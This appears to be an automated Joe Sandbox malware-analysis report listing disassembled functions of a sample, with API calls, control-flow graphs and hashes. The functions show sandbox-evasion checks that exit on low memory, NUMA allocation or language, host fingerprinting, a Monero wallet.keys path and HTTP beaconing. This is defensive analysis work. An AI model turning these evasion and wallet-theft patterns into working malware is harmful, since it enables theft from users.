                                          • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExitProcess
                                          • String ID: block
                                          • API String ID: 621844428-2199623458
                                          • Opcode ID: 65bf40b68995427a3e16a2aaa55a4fc89fb28c7b5282902b93e03feef96c2833
                                          • Instruction ID: b602c2985fddedd208355e270cc5b8f4ce872af566f11e20a886a13bf5a32072
                                          • Opcode Fuzzy Hash: 65bf40b68995427a3e16a2aaa55a4fc89fb28c7b5282902b93e03feef96c2833
                                          • Instruction Fuzzy Hash: 255134B4B04209EBCB14DFA0D955AFF77B5AF89704F10A098E806BB280D775F941CB62
                                          Function 00EA7500 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 106memoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1356 ea7500-ea754a GetWindowsDirectoryA 1357 ea754c 1356->1357 1358 ea7553-ea75c7 GetVolumeInformationA call ea8d00 * 3 1356->1358 1357->1358 1365 ea75d8-ea75df 1358->1365 1366 ea75fc-ea7617 GetProcessHeap RtlAllocateHeap 1365->1366 1367 ea75e1-ea75fa call ea8d00 1365->1367 1369 ea7628-ea7658 wsprintfA call eaa740 1366->1369 1370 ea7619-ea7626 call eaa740 1366->1370 1367->1365 1377 ea767e-ea768e 1369->1377 1370->1377
                                          APIs
                                          • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00EA7542
                                          • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00EA757F
                                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00EA7603
                                          • RtlAllocateHeap.NTDLL(00000000), ref: 00EA760A
                                          • wsprintfA.USER32 ref: 00EA7640
                                            • Part of subcall function 00EAA740: lstrcpy.KERNEL32(00EB0E17,00000000), ref: 00EAA788
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                          • String ID: :$C$\$
                                          • API String ID: 1544550907-3109660283
                                          • Opcode ID: 4664824caa19dc6db42c1dc6ada0eb3c072c2523f2d84a46a6876055fb27ed8b
                                          • Instruction ID: dd973ed38a338ca556c118bfe1e6ebbda0a89faa76d79725022c1bfde2de4448
                                          • Opcode Fuzzy Hash: 4664824caa19dc6db42c1dc6ada0eb3c072c2523f2d84a46a6876055fb27ed8b
                                          • Instruction Fuzzy Hash: AC4182B1E04248EBDB10DF94DC45BEEBBB8AF4D704F100199F54A7B280DB796A44CBA5
                                          Function 00EA69F0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                            • Part of subcall function 00EA9860: GetProcAddress.KERNEL32(76210000,00BB1518), ref: 00EA98A1
                                            • Part of subcall function 00EA9860: GetProcAddress.KERNEL32(76210000,00BB1770), ref: 00EA98BA
                                            • Part of subcall function 00EA9860: GetProcAddress.KERNEL32(76210000,00BB1530), ref: 00EA98D2
                                            • Part of subcall function 00EA9860: GetProcAddress.KERNEL32(76210000,00BB1548), ref: 00EA98EA
                                            • Part of subcall function 00EA9860: GetProcAddress.KERNEL32(76210000,00BB1560), ref: 00EA9903
                                            • Part of subcall function 00EA9860: GetProcAddress.KERNEL32(76210000,00BB8BA8), ref: 00EA991B
                                            • Part of subcall function 00EA9860: GetProcAddress.KERNEL32(76210000,00BA5208), ref: 00EA9933
                                            • Part of subcall function 00EA9860: GetProcAddress.KERNEL32(76210000,00BA4FE8), ref: 00EA994C
                                            • Part of subcall function 00EA9860: GetProcAddress.KERNEL32(76210000,00BB1698), ref: 00EA9964
                                            • Part of subcall function 00EA9860: GetProcAddress.KERNEL32(76210000,00BB16E0), ref: 00EA997C
                                            • Part of subcall function 00EA9860: GetProcAddress.KERNEL32(76210000,00BB16B0), ref: 00EA9995
                                            • Part of subcall function 00EA9860: GetProcAddress.KERNEL32(76210000,00BB16C8), ref: 00EA99AD
                                            • Part of subcall function 00EA9860: GetProcAddress.KERNEL32(76210000,00BA5088), ref: 00EA99C5
                                            • Part of subcall function 00EA9860: GetProcAddress.KERNEL32(76210000,00BB16F8), ref: 00EA99DE
                                            • Part of subcall function 00EAA740: lstrcpy.KERNEL32(00EB0E17,00000000), ref: 00EAA788
                                            • Part of subcall function 00E911D0: ExitProcess.KERNEL32 ref: 00E91211
                                            • Part of subcall function 00E91160: GetSystemInfo.KERNEL32(?), ref: 00E9116A
                                            • Part of subcall function 00E91160: ExitProcess.KERNEL32 ref: 00E9117E
                                            • Part of subcall function 00E91110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00E9112B
                                            • Part of subcall function 00E91110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00E91132
                                            • Part of subcall function 00E91110: ExitProcess.KERNEL32 ref: 00E91143
                                            • Part of subcall function 00E91220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00E9123E
                                            • Part of subcall function 00E91220: ExitProcess.KERNEL32 ref: 00E91294
                                            • Part of subcall function 00EA6770: GetUserDefaultLangID.KERNEL32 ref: 00EA6774
                                            • Part of subcall function 00E91190: ExitProcess.KERNEL32 ref: 00E911C6
                                            • Part of subcall function 00EA7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00E911B7), ref: 00EA7880
                                            • Part of subcall function 00EA7850: RtlAllocateHeap.NTDLL(00000000), ref: 00EA7887
                                            • Part of subcall function 00EA7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00EA789F
                                            • Part of subcall function 00EA78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00EA7910
                                            • Part of subcall function 00EA78E0: RtlAllocateHeap.NTDLL(00000000), ref: 00EA7917
                                            • Part of subcall function 00EA78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00EA792F
                                            • Part of subcall function 00EAA9B0: lstrlen.KERNEL32(?,00BB8938,?,\Monero\wallet.keys,00EB0E17), ref: 00EAA9C5
                                            • Part of subcall function 00EAA9B0: lstrcpy.KERNEL32(00000000), ref: 00EAAA04
                                            • Part of subcall function 00EAA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EAAA12
                                            • Part of subcall function 00EAA8A0: lstrcpy.KERNEL32(?,00EB0E17), ref: 00EAA905
                                          • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00BB8BC8,?,00EB110C,?,00000000,?,00EB1110,?,00000000,00EB0AEF), ref: 00EA6ACA
                                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00EA6AE8
                                          • CloseHandle.KERNEL32(00000000), ref: 00EA6AF9
                                          • Sleep.KERNEL32(00001770), ref: 00EA6B04
                                          • CloseHandle.KERNEL32(?,00000000,?,00BB8BC8,?,00EB110C,?,00000000,?,00EB1110,?,00000000,00EB0AEF), ref: 00EA6B1A
                                          • ExitProcess.KERNEL32 ref: 00EA6B22
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                          • String ID:
                                          • API String ID: 2931873225-0
                                          • Opcode ID: e38ced180883412f4f6acc2f53be28ff156329c283335bb013a857bb54cf1f82
                                          • Instruction ID: c6142d548cb9ac4842189c87c3c56b0a252b70bac7832ad1634f8089e2f83190
                                          • Opcode Fuzzy Hash: e38ced180883412f4f6acc2f53be28ff156329c283335bb013a857bb54cf1f82
                                          • Instruction Fuzzy Hash: 24315031A00308AADB08F7F0DC56BEE77B8AF4A340F056528F642BA181DF747901C7A2
                                          Function 00EA6AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1436 ea6af3 1437 ea6b0a 1436->1437 1439 ea6aba-ea6ad7 call eaaad0 OpenEventA 1437->1439 1440 ea6b0c-ea6b22 call ea6920 call ea5b10 CloseHandle ExitProcess 1437->1440 1446 ea6ad9-ea6af1 call eaaad0 CreateEventA 1439->1446 1447 ea6af5-ea6b04 CloseHandle Sleep 1439->1447 1446->1440 1447->1437
                                          APIs
                                          • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00BB8BC8,?,00EB110C,?,00000000,?,00EB1110,?,00000000,00EB0AEF), ref: 00EA6ACA
                                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00EA6AE8
                                          • CloseHandle.KERNEL32(00000000), ref: 00EA6AF9
                                          • Sleep.KERNEL32(00001770), ref: 00EA6B04
                                          • CloseHandle.KERNEL32(?,00000000,?,00BB8BC8,?,00EB110C,?,00000000,?,00EB1110,?,00000000,00EB0AEF), ref: 00EA6B1A
                                          • ExitProcess.KERNEL32 ref: 00EA6B22
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                          • String ID:
                                          • API String ID: 941982115-0
                                          • Opcode ID: 50d4fd8ea95c8c9c185e0d5f14048a6cdfd36454b07e1ffeab89234d16d95c23
                                          • Instruction ID: 91207f42df7b97b76a915254b18064a6bfc5777dfac2d9a35d06a67ee543977f
                                          • Opcode Fuzzy Hash: 50d4fd8ea95c8c9c185e0d5f14048a6cdfd36454b07e1ffeab89234d16d95c23
                                          • Instruction Fuzzy Hash: 6CF03A30A40209EEEB20ABA09C06BBE7BB4FF0E701F196514B913BA181DBB56540D665
                                          Function 00E947B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                          • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00E94839
                                          • InternetCrackUrlA.WININET(00000000,00000000), ref: 00E94849
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CrackInternetlstrlen
                                          • String ID: <
                                          • API String ID: 1274457161-4251816714
                                          • Opcode ID: dfe07d02ae855274e975856867e7ba4baa21b620ecd0b84a06b608c23d389119
                                          • Instruction ID: 81497605be7216af69ef292eac075d2af5c5227597289e77910ac13797eae300
                                          • Opcode Fuzzy Hash: dfe07d02ae855274e975856867e7ba4baa21b620ecd0b84a06b608c23d389119
                                          • Instruction Fuzzy Hash: 14212CB1D01209ABDF14DFA4E849ADE7BB5FB45320F108625E955AB2C0EB746A09CB81
                                          Function 00EA51F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                            • Part of subcall function 00EAA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00EAA7E6
                                            • Part of subcall function 00E96280: InternetOpenA.WININET(00EB0DFE,00000001,00000000,00000000,00000000), ref: 00E962E1
                                            • Part of subcall function 00E96280: StrCmpCA.SHLWAPI(?,00BBFCF0), ref: 00E96303
                                            • Part of subcall function 00E96280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00E96335
                                            • Part of subcall function 00E96280: HttpOpenRequestA.WININET(00000000,GET,?,00BBF278,00000000,00000000,00400100,00000000), ref: 00E96385
                                            • Part of subcall function 00E96280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00E963BF
                                            • Part of subcall function 00E96280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00E963D1
                                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00EA5228
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                          • String ID: ERROR$ERROR
                                          • API String ID: 3287882509-2579291623
                                          • Opcode ID: 45ae09c57e8a6db1d92acde36c0e97ca54017086e273b9a5ce986c7cb5b8c8be
                                          • Instruction ID: 4ee3c4a7a0ec4bf53ad19519b673e027cca24d47fed65ea9ae2e45d07b826242
                                          • Opcode Fuzzy Hash: 45ae09c57e8a6db1d92acde36c0e97ca54017086e273b9a5ce986c7cb5b8c8be
                                          • Instruction Fuzzy Hash: F3113031900208ABCB58FF64DD56AED73B8AF59340F855168F80B6F592EF34BB05CA91
                                          Function 00E91220 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1493 e91220-e91247 call ea89b0 GlobalMemoryStatusEx 1496 e91249-e91271 call eada00 * 2 1493->1496 1497 e91273-e9127a 1493->1497 1499 e91281-e91285 1496->1499 1497->1499 1501 e9129a-e9129d 1499->1501 1502 e91287 1499->1502 1504 e91289-e91290 1502->1504 1505 e91292-e91294 ExitProcess 1502->1505 1504->1501 1504->1505
                                          APIs
                                          • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00E9123E
                                          • ExitProcess.KERNEL32 ref: 00E91294
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExitGlobalMemoryProcessStatus
                                          • String ID: @
                                          • API String ID: 803317263-2766056989
                                          • Opcode ID: fb65ae3faf6d9938da0049b4d0736efa91e926167600f5d460a9ba8ff53cf616
                                          • Instruction ID: 96727bf4d7128f70a7b40c134a7f134e02397a66745f6caf702f35e85ba04de9
                                          • Opcode Fuzzy Hash: fb65ae3faf6d9938da0049b4d0736efa91e926167600f5d460a9ba8ff53cf616
                                          • Instruction Fuzzy Hash: 090162B0E44308FADF10EBD0CD49B9EB7B8EB04705F209484E706BA1C0D77465419759
                                          Function 00E91110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00E9112B
                                          • VirtualAllocExNuma.KERNEL32(00000000), ref: 00E91132
                                          • ExitProcess.KERNEL32 ref: 00E91143
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Process$AllocCurrentExitNumaVirtual
                                          • String ID:
                                          • API String ID: 1103761159-0
                                          • Opcode ID: 17a2cef60fd5a1fc0ed53ddb1a6334007bbec757022db4b93cb631e6860c614c
                                          • Instruction ID: 623b5c102687a4ea07d4a4a9a9696e89fb8c64ac5c06a895e8a6e3b5b714f037
                                          • Opcode Fuzzy Hash: 17a2cef60fd5a1fc0ed53ddb1a6334007bbec757022db4b93cb631e6860c614c
                                          • Instruction Fuzzy Hash: 89E0E670A46348FFEB206BA19C0FB0976B8AB04B05F105095FB09771C4D6BA26409799
                                          Function 00E910A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00E910B3
                                          • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 00E910F7
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Virtual$AllocFree
                                          • String ID:
                                          • API String ID: 2087232378-0
                                          • Opcode ID: e9c0ccd840ecf18bd96aea16af45c97322eacb679d50bc20c128e13cafa8991b
                                          • Instruction ID: 532d0b9c1008aaf1fa88c96fcf72548273b24eb3874cceb823d223aaec942041
